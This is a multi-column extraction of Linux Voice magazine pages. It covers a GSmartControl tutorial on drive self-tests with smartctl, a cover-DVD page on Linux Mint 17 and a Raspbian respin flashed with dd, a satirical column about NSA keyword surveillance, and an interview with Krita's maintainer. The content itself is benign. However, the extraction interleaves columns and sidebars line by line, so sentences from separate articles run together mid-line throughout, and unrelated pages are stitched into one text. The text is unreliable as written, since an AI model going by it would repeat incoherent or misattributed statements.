makes it much easier to use Smart interactively. You
can use GSmartControl without knowing how to use
smartctl, but a little knowledge will help you Click on a device to see a health summary or double-click
understand some of the features and options. for detailed device information and to run tests.
Your distro’s repository should contain the
GSmartControl package, so installing should be
straightforward: and serial number to this view. Click on an icon to
apt-get install gsmartcontrol select it and a summary is displayed at the top of the
It’s a GTK application so its dependencies are window. Expanding the More option shows the drive’s
minimal. Launching it can be as simple as typing model family and offers options that enable/disable
gsmartcontrol but you will need root privileges to Smart and, if the drive supports them, its automatic
access some of the Smart functionality. As a offline tests.
convenience, you can launch it like this instead
gsmartcontrol-root Health check for drives
which will automatically perform su to gain root You work in GSmartControl one drive at a time.
privileges (this requires that your environment has a Double-click on a drive to open its device information
graphical su interface, such as gksu). Enter the root window. This displays Smart data in tabs for identity,
password if prompted. attributes, capabilities and logs. Each tab displays
Once it’s been appropriately launched, a scan is output from smartctl that you could get like this:
performed and the available drives are displayed as sudo smartctl --health --info --capabilities --attributes /dev/sda
icons. You may see icons for non-Smart devices such The tabbed display makes the information more
as floppy and optical drives, but you can choose to readable and provides plentiful help text that goes a
hide such devices by setting an option in Options > long way to explain what the information means.
Preferences. If the scan misses a device that you Hover your mouse pointer over most things and a
want, use Device > Add Device to add it manually. pop-up will explain what it is. This is especially useful
The icon’s title shows the drive’s make and model; when viewing attributes and capabilities whose
you can, in Options > Preferences, add its device name meanings may be less-than obvious. This online
You can customise the behaviour of
GSmartControl through Options >
Preferences on the main window’s menu.
It has two tabs; the first allows
application-wide general preferences. The
second tab (shown right) enables you to
configure how specific drives are handled.
Some drives with firmware bugs need
additional options passed to smartctl and
this is where you can specify them. You can
also blacklist irrelevant devices, like floppy
disk drives, from the device scan so they
aren’t displayed. You can see the progress of a running test and when it
should finish.
The tabbed device
information presents the
Smart data clearly and
with additional helpful
information. You can View
Output to see the raw
smartctl output if you
really want to, or you can
save it to a file.
documentation is value added by GSmartControl that you can go straight there. It also augments the pop-up
is not present in smartctl. help with further information specific to the problem.
Another tab enables you to perform the self-tests There are three levels: notices are displayed in a
that the drive supports: the short, long and conveyance light pink colour; warnings in a darker pink; and alerts
tests. It gives an estimate for how long the test will in red. Notices convey information that you should be
take. Press the Execute button to start the test. A aware of – they are not Smart errors reported by
progress bar reassures you that the test is running and smartctl, but GSmartControl interprets the Smart data
estimates the remaining time, which is a nice feature to provide another level of reporting. Warnings are
that the command line smartctl lacks. Behind the raised by old-age attributes and alerts by pre-fail PRO TIP
scenes, GSmartControl is launching the test attributes. Launch gsmartcontrol
smartctl -t short /dev/sda --verbose to see the
underlying smartctl
and then polling for status until the it completes A pinch of salt commands.
smartctl -c /dev/sda Having Smart is better than not having it, but you
Once the test completes, the result is displayed. shouldn’t become complacent. It is prudent to have a
“Completed without error” is what you want to see! backup (and recovery) strategy for your data. Smart
does have its issues – it
Oh no, I have an error! can’t possibly detect
To help draw your attention to problems, the device every kind of failure, and “Having Smart is better than
information screen highlights potential problems. It
highlights both the error and the tab containing it, so
may show errors that
don’t necessarily impact
not having it, but you shouldn’t
a drive’s stability. become complacent.”
Virtual devices Smart is implemented
by the drive
You can load smartctl data from a file as a virtual device. manufacturers, and they don’t always adhere to the
You could, for example, extract data on a remote server correct standard. Some drives use Smart data fields
using the command line with something like this:
ssh root@remoteserver smartctl -a /dev/sda > for different values, and other firmware idiosyncrasies
remoteserver_sda may introduce bugs or other undesirable features.
You can then use Device > Load SmartCtl Output As They sometimes provide proprietary utilities and
Virtual Device to load that data into GSmartControl. It’s
promote these instead of Smart. However, Smart is a
presented as another device on the main screen, and you
can interact with it in exactly the same way as real devices. useful addition to your toolbox and may provide timely
The only exception is that you can’t run tests. warnings of potential data loss, giving you time to act
There is also a Save As function to save a device’s before it happens.
smartctl data. This may be useful to keep historic records
so that you can compare how a device changes over time.
John Lane is a technology consultant with a penchant for
You would have to do such comparisons yourself, however,
Linux. He helps new businesses and start-ups make the most
because GSmartControl doesn’t offer that feature.
of open source software. 111
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DVD 006
Welcome to the DVD! It’s been a successful, and for good reason: share his efforts with the world.
few issues since we had a disc on it’s attractive, it includes up-to- What a nice chap he is! Plus, we
the cover, but a few things have date software, it has an excellent have some newbie-friendly videos
happened and we absolutely had supporting community and it’s explaining Linux, along with the
to bring you the latest software for built upon robust Ubuntu and most recent episodes of our
your exploring pleasure. Debian foundations. podcast. Enjoy, and if you have any
First, a shiny new release of Meanwhile, our very own Ben suggestions for future discs, just
Linux Mint, the world’s most Everard has been working on a drop me a line!
popular desktop distribution souped-up version of Raspbian,
(according to DistroWatch) the main Raspberry Pi Linux Mike Saunders, Disc Editor
arrived. Mint has been incredibly distribution, and has decided to
Desktop distribution
Linux Mint 17 “Qiana”
32- and 64-bit versions included, so take your pick!
e reviewed Mint 17 last month, you can of course install it yourself – that’s
giving it 5/5 stars and the beauty of using Linux.
summarising it as follows: Linux Mint 17 boots in live mode, which
“Mature, reliable and with five years of means it runs directly from the DVD, so you
support ahead. It’s boring, but for a Long can explore it and se what you think while
Term Support release that’s exactly what we you’re deciding whether to install it. Boot
want”. Yes, Mint 17 is an excellent release, your machine from the DVD – in most
and it’s not surprising that it’s at the top of cases, this just means starting your PC with
the charts on It has won the disc in your drive. (If that doesn’t work,
many fans both among new users and you may need to change your PC’s boot
experienced Linuxers, and it’s a great way to order in the BIOS, so consult your system’s
dip your toes into the world of Linux or documentation.) Mint 17 doesn’t look drastically different to the
simply update your machine to get all of the last release; it’s all about refinements here.
latest packages. The version on our DVD 32- & 64-bit
sports the slick Cinnamon interface, but if At the menu you’ll be asked whether you
you prefer the more traditional Mate desktop want the 32-bit or 64-bit version, so choose
whatever’s relevant for your machine. Mint
17 will boot up, and you’ll arrive at the
desktop. You can now explore the distro; to
install it to your hard drive, double-click the
icon on the desktop and follow the prompts.
Recommended minimum system
requirements are a 1.5GHz CPU, 1GB RAM
and 10GB of hard drive space.
If your PC currently only runs Windows,
you can install Linux alongside it to get a
boot menu when you start the machine. For
Mint 17’s welcome screen is prettier and more information and help on Mint, visit
faster than ever before.
Enhanced Pi distro
Raspbian LV Edition
More software, a better interface and heaps of tutorials…
aspbian, the most commonly used using the GTK toolkit, so fits in with the
Linux distribution on the Raspberry LXDE environment.
Pi, is the thing that makes the Synaptic provides a nice interface for
single-board computer work so well for so installing software, while AbiWord and
many people. It’s been tweaked and tuned to Gnumeric give us useful office functionality.
take advantage of the unusual hardware They can be a little slow on the Pi, but they’re
characteristics of the Raspberry Pi. It’s also great for simple tasks. Having office
the platform on which hundreds of hardware software installed out of the box makes all Sink your teeth into new projects with the
add-ons are tested, while thousands of the difference, we feel – especially if you’re tutorials we’ve included as part of the distro!
online tutorials and half a million forum setting up an internet-less Pi for kids, and
posts explain how it works. want to give them some tools for learning you’ll get all the latest software from the
However, we find that there are a few bits and doing their homework. Raspberry Pi foundation, and everything
missing that we install every time we Lastly, we added a bunch of tutorials from should run in the same way. You could think
re-image an SD card. We’ve gradually been previous issues of Linux Voice. These show if it as a new way to install Raspbian with a
building our own Linux Voice re-spin of you how to build a Mars rover, install different default setup.
Raspbian that we use every day, and we’re OwnCloud, create a Pi-powered arcade To use the Raspbian Linux Voice respin,
sharing it for the first time. machine and much more. They’re in PDF you’ll need to copy it from the DVD to your
It still uses the LXDE desktop format and accessible straight from the home directory, extract it and then use dd to
environment, but we’ve spiced it up with the desktop – just double-click the Linux Voice transfer it to the SD card. It’s compressed as
Metacity window manager and some new folder to get reading. a .xz archive, so this is done with:
artwork (the icons come courtesy of unxz lvpi3.img.xz
Elementary, while the desktop wallpapers Clearing out the chaff sudo dd if=lvpi3.img of=/dev/<sd-card-dev> bs=4M
are from TPBarret and P4uLx on DeviantArt). To make space for all of these additions, we Replace <sd-card-dev> with the device
There’s also a panel that pops out of the left removed the Wolfram Mathematica node used by your SD card. For example, on
side of the screen to provide a quick packages. Although this is great software, our machine there are two hard drives (sda
launcher for some of the more popular we designed our distro for hobbyists, not and sdb), so the SD card is sdc. If you’re
pieces of software. schools, and we didn’t feel it would be used unsure, the command df -h will list all the
We’ve added a few pieces of software that enough to justify a place by default. Should drives and you should be able to figure out
we often find ourselves needing. Perhaps you need it, it’s just an apt-get (or Synaptic which one is the SD card by what size it is.
our personal biggest issue with Raspbian is click) away. So while this is an awesome Be careful though because it will overwrite
the lack of a decent graphical text editor in souped-up Pi distro, it’s not a revolutionary all the data on the drive!
the default build, so our distro includes change and everything you know (or will If you’re new to the Raspberry Pi, see the
Gedit. This may not be your favourite editor, learn!) about Raspbian still applies. detailed installation instructions at
but it’s easy to use, has programmers’ Our distro is still linked to the usual
features like syntax highlighting, and is built package-laden Raspbian repositories, so installation/installing-images/
And there’s more!
Newbie-friendly videos and the latest podcasts
Linux Voice is an unashamedly geeky what Linux is, how to install it, and how to
magazine: we love coding, we love fiddling use it. They’re based on Linux Mint, so are
with config files, and we love text editors that well worth watching before you install the
take a lifetime to learn. But we also know that distribution from the DVD.
everyone has to start somewhere, so for those Meanwhile, if you’ve been with Linux Voice
curious dabblers who are trying Linux for for a while, you may know that we record a
the first time after picking up this magazine, pocast every two weeks and put it on our
we’ve included some getting started videos. website. If your bandwidth isn’t so great, grab
Just open up index.html on the DVD in the latest episodes from the disc and hear
Firefox, and scroll down to the Videos section. Graham, Andrew, Ben and Mike talk about
There you’ll see three short videos created everything that’s good and bad in FOSS (and Linux isn’t scary – it’s just different. Our videos
by our very own Graham Morrison, explaining about our discoveries finds too). explain the ins and outs of Mint. 113
Final thoughts, musings and reflections
Nick Veitch
was the original editor
And the quaint old
of Linux Format, a town of Deventer Cintiq Hybrid Companion,
role he played until he Behind the keyboard: provides the backdrop provided by Wacom to the
got bored and went Huion H610 tablet, Krita project, thanks!
to work at Canonical provided to the Krita
instead. Splitter! project by Huion,
On the monitor: Kiki, the
Krita mascot (made us
hugely popular in Japan!)
wenty years ago, I and many other
people involved in IT, were convinced that
various government agencies were
reading email and protecting their respective Mac mini, ready for
when we get our
nations from terrorist attacks by searching for Laptop with kickstarter super-
suspicious words like “bomb” and “plot”. The Kubuntu Desktop with stretch goal
OpenSUSE 13.1
defence against this was to litter *every* email
with as many mentions of suspicious words as
we could think of. Generating large amounts of
this ‘spook fodder’, we thought, would cause the
agencies to pointlessly investigate countless
My Linux setup Boudewijn Rempt
numbers of emails and presumably get a bit fed
up. We needn’t have bothered.
Oh, ‘they’ most assuredly were reading mails,
but what we didn’t realise at the time was that After Krita’s Kickstarter campaign successfully closed with
the list of suspicious and subversive words close to €20,000, we asked its maintainer about his kit.
probably already included terms that already
littered our mails, like ‘privacy’. And ‘linux’. What version of Linux are you I started using SuSe 5.1 after that.
Recent revelations of the NSA’s XKeyScore using at the moment?
code, if genuine, suggest that simply searching OpenSUSE 13.1, Kubuntu 14.4 and What Free Software/open source
for privacy tools such as Tor and Tails will cause CentOS 6.4. Also some Windows can’t you live without?
people to be considered worthy of rigorous and OSX on the sidelines. OpenSUSE is Linux, KDE, konsole, kate, Qt, Qt
investigation. As will, apparently, visiting that well my perfect development system, though. Creator, Krita, Bash, git, gcc...
known portal of international terrorism, the Linux Apache, too. Mailman, Wordpress,
Journal website. Which desktop do you prefer (we Joomla. Basically, I’d probably retire and
It is time to embrace our status as dangerous think we know the answer)? become a second-hand bookseller or
subversives who are enemies of the state and I mostly use KDE, but sometimes I something similarly analog if there were
use it to our advantage. It is unlikely we will ever have to test Krita on Gnome or no free software!
be called up for jury duty for one. If you ever go Unity. I’ve used KDE since 1.2.
sailing you can be pretty sure that if you get lost What do other people love but
that the most up to date satellite surveillance What was the first Linux setup you can’t get on with?
tools know where you are to the nanometre. And you ever used? I’m not very fond of flamewars...
I look forward to the day when IT recruiters The first Linux I downloaded was People seem to love those. I’ve
realise that more important than how many SLS, on a huge stack of floppies. I happily used Vi and XEmacs in the same
LinkedIn recommendations you have is the never got that to work, though, the first session. I’ve got KDE and Gnome on all
number of national security blacklists you time I got Linux to run was with my systems. Well, what I really cannot
appear on. Bomb. Plot. NSA. Beer. Terror. Robots. Slackware. After gettting out the stand is software created to take the place
Olivia Newton-John. Question Time. Chesney calculator to figure out the modelines, I of GPL-licensed software, like llvm. I’m a
Hawks. 100ml Lithium. apt-get install tor. even got X11 working! GPL die-hard!
Master the awesome Krita 2.8
(CC-BY-SA Ivan Yossi)
CC-BY-SA Ivan Yossi)